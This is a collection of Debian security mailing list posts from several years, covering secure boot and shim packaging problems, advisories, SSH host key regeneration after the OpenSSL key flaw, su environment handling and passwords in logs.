Re: [arm64] secure boot breach via VFIO_NOIOMMU
On Thu, Dec 14, 2023 at 09:26:09AM +0100, Salvatore Bonaccorso wrote: >Hi, > >On Wed, Dec 13, 2023 at 10:45:01PM +0100, Bastian Blank wrote: >> Hi >> >> Over six years ago, support for VFIO without IOMMU was enabled for >> arm64. This is a breach of the integrity lockdown requirement of secure >> boot. >> >> VFIO is a framework for handle devices in userspace. To make >> this safe, an IOMMU is required by default. Without it, user space can >> write everywhere in memory. The code is still not conditional on >> lockdown, even if a patch was proposed. >> >> I intend to disable this option for all supported kernels. Definitely. >Agreed. > >For the readers reading this along, this was raised in context of >https://salsa.debian.org/kernel-team/linux/-/merge_requests/925#note_446730 >and >https://salsa.debian.org/kernel-team/linux/-/merge_requests/502#note_315464 > >The proposed patch felt probably trough the cracks. Nod. -- Steve McIntyre, Cambridge, UK.st...@einval.com The two hard things in computing: * naming things * cache invalidation * off-by-one errors -- Stig Sandbeck Mathisen
Re: Problems with shim and shim-signed in unstable, and proposed solutions to unblock us
On Mon, Mar 04, 2019 at 04:30:46PM +, Steve McIntyre wrote: >> >>3. Upload new version of the shim-signed source package and a >> (lightly) bodged binary package >>3a. Use versions: >> - source: 1.28+nmu2 >> - binary: 1.28+nmu2+0.9+1474479173.6c180c6-1 >>3b. Needs as build-deps an old version of sbsigntool (0.6-3.2) and >>specifically version 0.9+1474479173.6c180c6-1 of shim in the >>build chroot >>3c. Then upload source+amd64 >>3d. New shim-signed binary package changes in a few ways: >>* new version of the binary now include fbx64.efi.signed and >> mmx64.efi.signed (copied across from the shim binary package) >>* add Replaces: shim (= 0.9+1474479173.6c180c6-1) so we don't >> conflict on those binaries >>* remove Depends: shim (the whole point!) >>* change Build-Depends to list the specific versions used for >> shim and sbsigntool >>3e. Already tested and working. I built this (source and binary >>debdiffs attached) and tested OK on SB system >>3f. This package is instantly RC-buggy due to the unavailable >>build-deps. We know... I've just uploaded #3 to unstable this evening. -- Steve McIntyre, Cambridge, UK.st...@einval.com "You can't barbecue lettuce!" -- Ellie Crane signature.asc Description: PGP signature
Re: Problems with shim and shim-signed in unstable, and proposed solutions to unblock us
I've had a reply from Mark (ftpteam) in IRC: On Sun, Mar 03, 2019 at 11:35:45PM +0000, Steve McIntyre wrote: ... >So, we're looking at three hacky options options here to work our way >out of this hole. In (probably?) descending order of hackitude: > >1. Ask the nice ftpmaster people to bodge the archive by hand: >1a. Remove the current shim source and binary packages from >unstable (version 15+1533136590.3beb971-2) >1b. Copy the older source and binary from buster back into >unstable for us. >1c. We're not even sure if this is *possible*, let alone a nice >thing to do - thoughts? >1d. Expecting that this might break all kinds of tools inside and >outside of the archive maybe? And Mark says: "we don't want to go rewinding version numbers in unstable; that could lead to all sorts of unforeseeable breakage. much as we'd expected. Any more feedback please? Cyril prefers approach #2 below, I prefer #3. >OR > >2. Upload new bodged versions of shim and shim-signed to get us > back to working with the previously-signed shimx64.efi.signed > binary >2a. Create new shim and shim-signed source packages, along with >matching binary packages. >2b. These binary packages will contain the *exact* same EFI >binaries as we have in buster but with a higher version number >in the packaging. >2c. As we cannot *exactly* reproduce the binaries sensibly, we >will have to hand-hack the contents of the binary packages. >2d. We *know* this is grotty too, but we can at least make this >work entirely at a package level. >2e. Already tested and working: Cyril has built packages like this >and I have tested the results successfully on my test SB >system here. > >Current versions in buster: > - shim: >- source: 0.9+1474479173.6c180c6-1 >- binary: 0.9+1474479173.6c180c6-1 > - shim-signed: >- source: 1.28+nmu1 >- binary: 1.28+nmu1+0.9+1474479173.6c180c6-1 > >Possible versions targetting sid: > - shim: > - source: 16+1474479173.6c180c6-1 (bumped “epoch-like” N+ > prefix, but same contents as 0.9+1474479173.6c180c6-1) > - binary: 16+1474479173.6c180c6-1 > - shim-signed: > - source: 1.28+nmu2 (new upload to adjust the Depends) > - binary: 1.28+nmu2+16+1474479173.6c180c6-1 > >OR > >3. Upload new version of the shim-signed source package and a > (lightly) bodged binary package >3a. Use versions: > - source: 1.28+nmu2 > - binary: 1.28+nmu2+0.9+1474479173.6c180c6-1 >3b. Needs as build-deps an old version of sbsigntool (0.6-3.2) and >specifically version 0.9+1474479173.6c180c6-1 of shim in the >build chroot >3c. Then upload source+amd64 >3d. New shim-signed binary package changes in a few ways: >* new version of the binary now include fbx64.efi.signed and > mmx64.efi.signed (copied across from the shim binary package) >* add Replaces: shim (= 0.9+1474479173.6c180c6-1) so we don't > conflict on those binaries >* remove Depends: shim (the whole point!) >* change Build-Depends to list the specific versions used for > shim and sbsigntool >3e. Already tested and working. I built this (source and binary >debdiffs attached) and tested OK on SB system >3f. This package is instantly RC-buggy due to the unavailable >build-deps. We know... -- Steve McIntyre, Cambridge, UK.st...@einval.com Is there anybody out there? signature.asc Description: PGP signature
Problems with shim and shim-signed in unstable, and proposed solutions to unblock us
[ Note CCs to multiple lists - we know multiple groups of people have an interest in this... ] Hi folks, We have issues with the setup of the shim and shim-signed packages in unstable at the moment, which is quite awkward to fix. See #922179 for the original bug report. shim and shim-signed have an ... awkward relationship, which causes us multiple problems at the moment. 1. shim is the primary source package, building one binary package which included several EFI binaries - the shimx64.efi binary itself, plus two helpers (fbx64.efi.signed and mmx64.efi.signed) 2. shimx64.efi is the EFI binary that is submitted to Microsoft for signing - it's the core of our Secure Boot implementation (like all Linux distros) 2b. The MS-signed binary (shimx64.efi.signed) is shipped in the shim-signed source package and passed through to the shim-signed binary package 2c. The shim-signed source package validates that the binary matches what we built in shim, and checks the signature applies.. 3. For $reasons, the existing shim-signed binary package has a strict versioned dependency on the shim binary package to pull in the helper binaries for installation. We are very much planning on fixing this, but this is the historical setup. 4. As requested, Steve Langasek uploaded a new upstream version of shim to unstable (15+1533136590.3beb971-2, which is there right now). 5. Until we get an MS signature on a new shim binary, we will *not* have a matching shim-signed binary package, so for now we still have the *old* (1.28+nmu1+0.9+1474479173.6c180c6-1) shim-signed binary and source in unstable. 6. Everything works OK right now in buster, but... 7. Right now, shim-signed is not installable in sid, which means that: 7a. People can't test SB in unstable 7b. (Worse) as shim-signed is a build-dep for d-i on amd64 (to be able to make SB-compatible installer images) we currently can't build d-i 8. We don't have an ETA for a new signature from MS which would unblock us. At *best*, we're expecting a few weeks. It's out of our control. FTAOD: this dependency problem has been here as a time bomb ever since day 1 of shim in Debian. We just haven't ever noticed as nobody was using these packages until very recently. Apologies for not spotting the problem before we uploaded newer versions and triggered this. AFAIK Ubuntu have got away with a very similar configuration due to a different archive setup. We're planning on redoing the packaging to get away from these problems ASAP so this problem will not recur. However, fixing things cleanly now is not easy: 1. We can't simply re-upload a new shim source package to get a new shim binary with the same version number as the old one 2. The old version of the shim binary package is encoded in the dependencies of the shim-signed binary package 3. We cannot reproduce the shimx64.efi EFI binary if we rebuild it today (Cyril has tried multiple ways), so we *cannot* simply upload a new shim source package and hope... So, we're looking at three hacky options options here to work our way out of this hole. In (probably?) descending order of hackitude: 1. Ask the nice ftpmaster people to bodge the archive by hand: 1a. Remove the current shim source and binary packages from unstable (version 15+1533136590.3beb971-2) 1b. Copy the older source and binary from buster back into unstable for us. 1c. We're not even sure if this is *possible*, let alone a nice thing to do - thoughts? 1d. Expecting that this might break all kinds of tools inside and outside of the archive maybe? OR 2. Upload new bodged versions of shim and shim-signed to get us back to working with the previously-signed shimx64.efi.signed binary 2a. Create new shim and shim-signed source packages, along with matching binary packages. 2b. These binary packages will contain the *exact* same EFI binaries as we have in buster but with a higher version number in the packaging. 2c. As we cannot *exactly* reproduce the binaries sensibly, we will have to hand-hack the contents of the binary packages. 2d. We *know* this is grotty too, but we can at least make this work entirely at a package level. 2e. Already tested and working: Cyril has built packages like this and I have tested the results successfully on my test SB system here. Current versions in buster: - shim: - source: 0.9+1474479173.6c180c6-1 - binary: 0.9+1474479173.6c180c6-1 - shim-signed: - source: 1.28+nmu1 - binary: 1.28+nmu1+0.9+1474479
Re: powerpc update for amd64
On Sun Mar 04, 2018 at 07:35:37 +0100, SZÉPE Viktor wrote: > What is the use of pushing an update with only powerpc changes to amd64? > Thank you. This is just a side-effect of the way the packages are built. When a new source upload is made then it is built for all available architectures, even if the changes are not useful / relevant for them. Typically security updates apply to all architectures. In this case just be glad you got "lucky" - and you don't have to schedule reboot(s) of all your server(s). Steve -- https://steve.fi/
Re: [SECURITY] [DSA 3074-2] php5 regression update
On Wed Nov 19, 2014 at 14:57:13 +0100, David MENTRE wrote: > >so people are advised to keep kernel > >symlink protection (sysctl fs.protected_symlinks=1) enabled as it is by > >default on Wheezy > > This setting is not set on my Wheezy machine. > > How can I set it permanently (i.e. across reboots). Take a look at /etc/sysctl.conf, and the comments at the top of that file pointing to the man-page and other locations. Steve -- Git-based DNS hosting https://dns-api.com/ -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: https://lists.debian.org/20141119140951.ga15...@steve.org.uk
Re: about bash and Debian Lenny
> Shellshock has such big impact on the internet so please give us Lenny > package. You need to remember that Debian is a project staffed by volunteers, some of whom have already offered packages. If you cannot trust random binaries then the patches are available. If you do have a legitimate reason for not upgrading, then your choices are few - and largely consist of: * Rolling your own packages, via the public patches, which you will then trust. * Finding somebody trustworthy. * Upgrading. My personal response to somebody requesting newer updates has got to be "What is your budget?".. Steve -- http://www.steve.org.uk/
Re: goals for hardening Debian: ideas and help wanted
On Thu, Apr 24, 2014 at 11:45:46AM +0200, Giacomo Mulas wrote: > On Thu, 24 Apr 2014, Paul Wise wrote: > >>Would the inclusion of more AppArmor profiles be applicable? > >Thanks, added along with SELinux/etc. > I second that. Actually, some time ago I tried using both AppArmor and > SELinux, but gave up because it took forever to find legitimate behaviour of > all kinds of common packages (most of them standard debian packages) and > prepare configuration files for things to work. If debian wants to foster > adoption of such security enhancements, it must go to great lengths in > making sure that (in order of importance in my humble opinion) > 1) all debian-packaged software works (very nearly) out of the box with > debian-supported MAC frameworks. It should be very clear that if they don't > it's an important bug that needs fixing. For example, such bugs should > prevent the inclusion of a package in an official stable release. Or split > the main debian archive in two, one that is MAC-ready and one that is not, > so each user can decide to only use packages known to work well with > debian-supported MAC frameworks. The apparmor policies in Debian apply a principle of minimal harm, confining only those services for which someone has taken the time to verify the correct profile. There are obviously pros and cons to each approach to MAC, which I'm not interested in arguing about; but one of the pros of the approach taken for apparmor is that all software *does* continue to work out of the box. If you found it otherwise, I think you should be filing a bug report against apparmor. -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. Ubuntu Developerhttp://www.debian.org/ slanga...@ubuntu.com vor...@debian.org signature.asc Description: Digital signature
Re: [SECURITY] [DSA 2521-1] libxml2 security update
My guess is libpfhttphook is not vulnerable. I'd like to hear from someone else tho. http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=679280 -Steve Sent from my phone On Aug 4, 2012, at 12:31, "Moritz Muehlenhoff" wrote: > CVE-2012-2807 -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/d17d2162-1fa7-44d9-9b11-0ec5a5313...@phonefactor.com
Re: Logs errors on Debian Squeeze with Bind 9.7.3
Hello,
Couple thoughts:
1) You should add semi-colons onto the end of the category lines within
the logging stanza.
2) I take it that you restarted bind after making changes in the
configuration file?
Also note that /etc/bind/namec.conf.options is the preferred place for
the logging stanza, or so I've gathered.
Steve
http://www.braingia.org/
On Tue, Jun 28, 2011 at 01:13:31PM -0300, OLCESE, Marcelo Oscar. wrote:
> Good morning people
> Since I upgraded to BIND 9.7.3 Debian 6, I'm having a lot of logs as
> I've outlined.
>
>error (network unreachable) resolving
> '98.31.207.117.in-addr.arpa/PTR/IN': 2001:500:13::73#53: 1 Time(s)
>error (network unreachable) resolving
> 'ABTS-mp-Dynamic-075.161.168.122.airtelbroadband.in/A/IN':
> 2001:500:45::1#53: 1 Time(s)
>error (network unreachable) resolving
> 'NSS2.CODETEL.NET.DO//IN': 2001:468:d01:20::80df:2023#53: 1
> Time(s)
>error (network unreachable) resolving 'SEC3.APNIC.NET/A/IN':
> 2001:500:13::c7d4:35#53: 1 Time(s)
>error (unexpected RCODE REFUSED) resolving
> '222.187.173.122.in-addr.arpa/PTR/IN': 202.56.230.5#53: 1 Time(s)
>error (unexpected RCODE REFUSED) resolving
> '244.76.168.122.in-addr.arpa/PTR/IN': 202.56.230.6#53: 1 Time(s)
>error (unexpected RCODE REFUSED) resolving
> 'ns01.wl-infra.net/A/IN': 62.75.191.6#53: 2 Time(s)
>error (unexpected RCODE SERVFAIL) resolving 'ns6.kvack.org/A/IN':
> 199.249.120.1#53: 1 Time(s)
>error (unexpected RCODE SERVFAIL) resolving 'utn.edu.ar/NS/IN':
> 200.16.98.2#53: 1 Time(s)
>error (unexpected RCODE SERVFAIL) resolving
> 'zone-ns6.dnswl.org/A/IN': 199.249.120.1#53: 1 Time(s)
>success resolving
> 'ABTS-MP-Dynamic-073.132.175.122.airtelbroadband.in/A' (in
> 'airtelbroadband.in'?) after disabling EDNS: 1 Time(s)
>success resolving
> 'ABTS-North-Dynamic-222.187.173.122.airtelbroadband.in/A' (in
> 'airtelbroadband.in'?) after reducing the advertised EDNS UDP packet
> size to 512 octets: 1 Time(s)
>success resolving
> 'ABTS-North-Static-039.25.160.122.airtelbroadband.in/A' (in
> 'airtelbroadband.in'?) after disabling EDNS: 1 Time(s)
>success resolving 'dnsbom.mantraonline.com/' (in
> 'mantraonline.com'?) after disabling EDNS: 1 Time(s)
>success resolving 'dnsdel.mantraonline.com/A' (in
> 'mantraonline.com'?) after disabling EDNS: 1 Time(s)
>
> I already made several changes including:
>
> /etc/default/bind9
>
> Resolvconf = yes
> OPTIONS = "-4-u bind-S 1024"
>
> and named.conf:
>
> logging {
> category lame-servers {null;}
> category edns-disabled {null;}
> };
>
> Any ideas?
>
> Regards,
> Marcelo O.
>
>
> --
> To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
> Archive: http://lists.debian.org/F0811723E5FB4D0A9D370D1D702B62D8@Marcelopc
--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20110628211139.ga11...@braingia.org
Re: [SECURITY] [DSA-2158-1] cgiirc security update
On Fri Feb 11, 2011 at 10:37:46 +0100, Axel Beckert wrote: > This package does not yet show up in Lenny. According to > http://packages.debian.org/search?keywords=cgiirc 0.5.9-3lenny1 has > been uploaded to squeeze's security repo only. Yes - this has been a bit of a mess, due to the release occurring during the middle of the preparation and release of the update. I'm uploading for lenny/old-security now. Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/ -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20110211102255.ga1...@steve.org.uk
Re: Results of environment variable fuzzing Debian 5.05 SUID/SGIDs
On Tue Jan 18, 2011 at 22:25:20 +1100, Silvio Cesare wrote: >This kind of testing is good for Debian security and provides some comfort >to me at least knowing this class of vulnerability has been tested for >against the privleged programs in the Debian repository. Agreed. I started doing the same thing a few years ago, and it was very useful. However to make your reports more thorough it is important to look at the source of the code to see if the crash is an exploitable one or not. Ideally you'd include that information in any bug reports you submitted. Steve -- http://www.steve.org.uk/ -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20110118114447.ga9...@steve.org.uk
Re: Results of environment variable fuzzing Debian 5.05 SUID/SGIDs
On Tue Jan 18, 2011 at 13:49:23 +1100, Silvio Cesare wrote: >lbreakout2 http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=608980 That could well be a duplicate of CAN-2004-0158, which was fixed in Woody: http://lists.debian.org/debian-changes/2004/02/msg00029.html Steve -- http://www.steve.org.uk/ -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20110118091546.ga32...@steve.org.uk
Re: libapache2-mod-fcgid in lenny vulnerable to hole for weeks
On Tue Dec 21, 2010 at 22:21:35 +0100, Stefan Fritsch wrote: > FWIW, it seems the infrastructure has been finally fixed today, so I > hope things will improve now. But I do think that there are currently > to few active members in the security team. I am pretty sure we will > send out a request for new volunteers soon. If there were a need for it I'd be happy to make myself available again for team work. I don't expect I'm going to suffer from being busy in the way that I was previously again. Steve -- http://www.steve.org.uk/ -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org Archive: http://lists.debian.org/20101223140859.ga21...@steve.org.uk
Re: rkhunter warning wget
On Thu Oct 15, 2009 at 17:55:39 +0200, m...@firstfloor.org wrote: > after updateing wget on > > Linux version 2.6.26-2-686 (Debian 2.6.26-19) Lenny > > i received a waring from rkhunter: > > Warning: The file properties have changed: > File: /usr/bin/wget > Current hash: 2d5d175c449eecfda43401a7a66b8a369859524d > Stored hash : 1725543768f7e1b2a32136ca1799213a8bdb886b > Current inode: 137892Stored inode: 140983 > Current size: 226292Stored size: 226260 > Current file modification time: 1255005510 > Stored file modification time : 1220829421 You've applied a security update, which has changed the binary /usr/bin/wget. The alert is telling you that the binary has changed, and since this is expected (because you've applied the security update) the alert is informational not a real report. Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/ -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Re: Maintaining packages properly
On Wed Mar 18, 2009 at 21:01:04 -0400, Micah Anderson wrote: > However, I do see your point about NEW packages, and it might be > interesting, if we could get enough security auditors who had the skills > and the time, to be a part of the NEW process. This could introduce an > unnecessary delay in the processing of packages, depending on the depth > and bredth of such an audit. Or even or a false sense of security if > people think that their packages are free of security holes if they've > passed NEW. The security audit project mostly seems to have stalled/died. There was a time when there were people actively taking part and doing semi-directed audits of the archive. These days it is very very rare that anybody does so, which is unfortunate (speaking both as the person who started it, and as somebody who would love to have such an effort be more visible and active.) I've been on the point of updating the webpages several times to say "this activity is dead, and these are merely historic notes" but haven't quite wanted to admit defeat. > > Maybe more people could join the debian security audit team? For a lot > > of PHP packages it would be enough to check whether certain functions > > (e.g. htmlspecialchars) are found. If not, this is often an > > indication of insufficient protection measures. > > Calling all interested security people who have just been dying to > show their skills, or develop stronger auditing skills! I think if there is no such response then it is definitely time to call it a day and cease pretending we have auditors on hand. Steve -- Managed Anti-Spam Service http://mail-scanning.com/ -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Re: Why is su preserving the environment?
On Sat, Jan 24, 2009 at 08:41:37AM +0100, Josselin Mouette wrote: > it has been brought to my attention (through #512803) that su does not > clean the environment at all. This has several security implications: > * variables like PERL5LIB or GTK_MODULES can be passed to another > user, leading to unwanted execution of code; > * variables like DBUS_SESSION_BUS_ADDRESS or XDG_SESSION_COOKIE > export authentication information that could be used to obtain > private information such as passwords in gnome-keyring. > Before I work around this specific issue in the fugliest way, shouldn’t > we prevent su from preserving the environment? > There have been several security advisories related to sudo not cleaning > the environment, and the final call has been to make env_reset the > default. Is there any reason why su should not be considered vulnerable > the same way? Because su does not attempt to control what commands are being run; if you can su to another user, you can run arbitrary commands as that user, which means there's no sense in trying to filter the environment. -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. Ubuntu Developerhttp://www.debian.org/ slanga...@ubuntu.com vor...@debian.org -- To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Re: [SECURITY] [DSA-1645-1] New lighttpd packages fix various problems
On Mon Oct 06, 2008 at 20:40:36 +0200, Gerfried Fuchs wrote: > From reading the changelog these issues have all three been addressed > in the 1.4.19-5 upload which was done a week ago already. Was this > missed, or are the patches therein considered incomplete? This was missed. Steve -- Managed Anti-Spam Service http://mail-scanning.com/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Bug#311772: Fwd: Password leaks are security holes
On Thu, Aug 28, 2008 at 09:36:41AM +0200, Giacomo A. Catenazzi wrote: > auth.log was invented for this reason, and separated to standard log: > it should be readable only by root, Then there is a bug in another package if this is what "should" be, because /var/log/auth.log is readable by group adm on all my systems. > Anyway root already has the capability to view passwords > (i.e. by installing alternate login programs, sniffing tty, ...) If the system uses MAC such as SELinux, this is not necessarily the case. We should design for such future technologies, and not expose passwords unnecessarily. On Thu, Aug 28, 2008 at 01:05:19PM +0200, Johan Walles wrote: > > auth.log was invented for this reason, and separated to standard log: > > it should be readable only by root, because users do errors. > It's readable by anybody with physical access to the hardware. The logging we're talking about takes place in pam_unix. The normal password store for pam_unix is /etc/shadow, which is on the hard drive; if the user has physical access, they can run a password cracker against this file anyway and try to grab *all* user passwords, not just those of users who don't read before they type. (It's true that the passwords are not in /etc/shadow for systems using pam_unix together with NIS or NIS+, but I consider both NIS and NIS+ rather uninteresting cases.) > > So auth.log should log usernames, so that users don't do > > wrong assumption that password are not accessible by root! > I can see a point in logging *valid* usernames. Logging invalid > usernames (which aren't unlikely to actually be passwords) is a > security risk. It provides information about username brute force attacks and other issues of concern to admins. On Thu, Aug 28, 2008 at 11:55:49AM +0200, Nico Golde wrote: > Maybe this is the case but that's why this file is only > readable for root and the adm group. So if an attacker is > able to read this file you have way more problems as he > wouldn't need to check the auth log for user errors but > could just trace the login process, crack shadow, write a > custom pam module or something similar to get your login > credentials. No, that's not true. The only added permission the 'adm' group has on Debian is to be able to read log files; so this *does* expose passwords to users who wouldn't otherwise be able to get at them. -- Steve Langasek Give me a lever long enough and a Free OS Debian Developer to set it on, and I can move the world. Ubuntu Developerhttp://www.debian.org/ [EMAIL PROTECTED] [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1631-1] New libxml2 packages fix denial of service
On Tue Aug 26, 2008 at 20:13:58 +0200, Christoph Auer wrote: > > Debian Security Advisory DSA-1631-_2_ [EMAIL PROTECTED] > > minor error in the subject My apologises, I managed to miss that. Steve -- Managed Anti-Spam Service http://mail-scanning.com/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1631-1] New libxml2 packages fix denial of service
On Fri Aug 22, 2008 at 21:56:35 +0200, Christian Jaeger wrote: > Just to make sure: have you seen the thread "Lenny users: attn about > Gnome/libxml2 breakage" on the debian-user mailing list (started by me)? No, I'm afraid I've not seen that. But looking over it I'm not sure if the problem is the same. On my personal Debian Unstable machine I'm not seeing any breakage - nor on my Etch system. It is possible it is soley broken on Lenny, but I don't have any systems to look at. I see you've reported a bug, so I guess we'll take it from there. Steve -- Managed Anti-Spam Service http://mail-scanning.com/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1571-1] New openssl packages fix predictable random number generator
On Tue, May 13, 2008 at 06:35:25PM -0300, dererk wrote: > On Tue, May 13, 2008 at 10:53:25PM +0200, Jan Luehr wrote: > > rm /etc/ssh/ssh_host_* > > ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N '' > > ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N '' > > /etc/init.d/ssh restart > > > > -> job done. > > > > Keep smiling > > yanosz > > Shorter one: > > rm /etc/ssh/ssh_host_* > dpkg-reconfigure openssh-server Note that doing either of these will result in host key failures and warnings for any clients attempting to connect to you. This is especially bad if you have things like rsync over ssh in a cron job. Moral of the story is to remember to update your known_hosts and let your users know that their ssh client of choice may bark at them. Steve http://www.braingia.org -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: securing server
Le 07-05-2008, à 19:39:57 +0800, Abdul Bijur Vallarkodath ([EMAIL PROTECTED]) a écrit : >haha. not really! if u have really managed an online server u'd have >seen tons of attacks and login attempts on your default ports by bots >looking around for weaker systems. Yes I have also seen that very often. >This is hence especially helpful, I myself have seen these bot attacks >reduce to almost zero once i had changed the port numbers of various >services on my system. Sure, but that doesn't mean you're more secure, just that you have less scans (which can be achieved by some well-thought iptables rules). > Now, you are talking about someone sitting and >concentrating on your machine, thats a diff story all together. isn't it? Yep, you're right. If someone really wants to attack you, changing the default ports number will just postpone the moment the attacks will really start. >you are smart, you should have known all this. Just tried to pinpoint an issue. Best regards -- Steve -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: securing server
Le 07-05-2008, à 17:34:08 +0800, Abdul Bijur Vallarkodath ([EMAIL PROTECTED]) a écrit : >just my two pence. and my two centimes. >* Change the ports of most ports like ssh, ftp, smtp, imap etc. from the >default ones to some other ones. >From my poor understanding of security related issues, I guess this is totally useless since any (good) port scanner will defeat this without any problem. Remember, security by obscurity is a bad idea. -- Steve -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [SECURITY] [DSA 1534-2] New iceape packages fix regression
On Thu Apr 24, 2008 at 14:13:14 -0700, Brad Dondale wrote: > I have started 2 weeks holidays. If you have any technical support > requests, please create a ticket with your online ticket system. Thanks! Please fix your broken auto-responding system. Steve -- Debian GNU/Linux System Administration http://www.debian-administration.org/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Is oldstable security support duration something to be proud of?
On Mon Mar 10, 2008 at 17:57:04 -0400, Filipus Klutiero wrote: > It should be supported as long as RHEL. Give me piles of cash and I'll support it for as long as you want. But this discussion is pointless. The statement is true *we* are proud; regardless of whether you or anybody else agrees or not. As has already been hashed out on the debian-www list. Steve -- http://www.steve.org.uk/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [vendor-sec] Re: qemu unchecked block read/write vulnerability
> Oops, it looks like I got the address wrong. I didn't intend to mail > the public [EMAIL PROTECTED] list but rather the private security > team list. Too late now. For future reference we do see vendor-sec mails, so the second copy wasn't really necessary. (Although it is helpful to make sure we get mails if it looks like there is no visible progress.) I hope that doesn't make you feel any worse! Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: strange output for command ps
This looks normal to me. I believe 'ps' cuts off the USER column after a certain number of characters. To test, I just added a user 'stevesuehring' to a local Debian etch box and then logged in as that user. The ps output shows 1002 in the USER column rather than the name. Steve On Wed, Jan 30, 2008 at 11:48:10PM +0100, Lindo Nepi wrote: > hi all. > on my debian box (debian 4.0 , kernel 2.6.18-4-686 #1 SMP Wed May 9 > 23:03:12 UTC 2007 i686 GNU/Linux ) > when i do "ps aux" i obtain: > > [EMAIL PROTECTED]:~$ ps aux > USER PID %CPU %MEMVSZ RSS TTY STAT START TIME COMMAND > root 1 0.0 0.1 1948 648 ?Ss Jan17 0:01 init [2] > root 2 0.0 0.0 0 0 ?SJan17 0:00 > [migration/0] > root 3 0.0 0.0 0 0 ?SN Jan17 0:00 > [ksoftirqd/0] > root 4 0.0 0.0 0 0 ?S< Jan17 0:00 [events/0] > root 5 0.0 0.0 0 0 ?S< Jan17 0:00 [khelper] > root 6 0.0 0.0 0 0 ?S< Jan17 0:00 [kthread] > root 9 0.0 0.0 0 0 ?S< Jan17 0:00 [kblockd/0] > > [snip] > > root 2620 0.0 0.1 1572 572 ?Ss Jan17 0:00 > /usr/sbin/acpid -c /etc/acpi/events -s /var/run/acp > 103 2733 0.0 0.1 2252 860 ?Ss Jan17 0:00 > /usr/bin/dbus-daemon --system > 106 2741 0.0 0.7 5572 4040 ?Ss Jan17 0:01 > /usr/sbin/hald > root 2742 0.0 0.1 2892 1016 ?SJan17 0:00 hald-runner > 106 2748 0.0 0.1 2020 852 ?SJan17 0:00 > hald-addon-acpi: listening on acpid socket /var/run > 106 2753 0.0 0.1 2020 864 ?SJan17 0:00 > hald-addon-keyboard: listening on /dev/input/event0 > root 2762 0.0 0.1 1812 620 ?SJan17 0:10 > hald-addon-storage: polling /dev/hdd > > [snip] > > www-data 6612 0.0 0.8 19112 4144 ?SN 07:36 0:00 > /usr/sbin/apache2 -k start > www-data 6613 0.0 0.8 19112 4144 ?SN 07:36 0:00 > /usr/sbin/apache2 -k start > www-data 6614 0.0 0.8 19112 4144 ?SN 07:36 0:00 > /usr/sbin/apache2 -k start > 121 6678 0.0 22.3 123368 115416 ? SNs 07:44 0:06 > /usr/sbin/dansguardian > 121 6679 0.0 22.3 123372 115360 ? SN 07:44 0:11 > /usr/sbin/dansguardian > 121 6680 0.0 22.8 126300 118064 ? SN 07:44 0:03 > /usr/sbin/dansguardian > 121 24594 0.0 22.5 130296 116300 ? SN 08:22 0:02 > /usr/sbin/dansguardian > 121 24595 0.0 22.4 126600 116096 ? SN 08:22 0:00 > /usr/sbin/dansguardian > 121 24596 0.0 22.5 124892 116300 ? SN 08:22 0:01 > /usr/sbin/dansguardian > 121 24597 0.0 22.4 124240 115944 ? SN 08:22 0:00 > /usr/sbin/dansguardian > 121 24598 0.0 22.4 123980 115928 ? SN 08:22 0:00 > 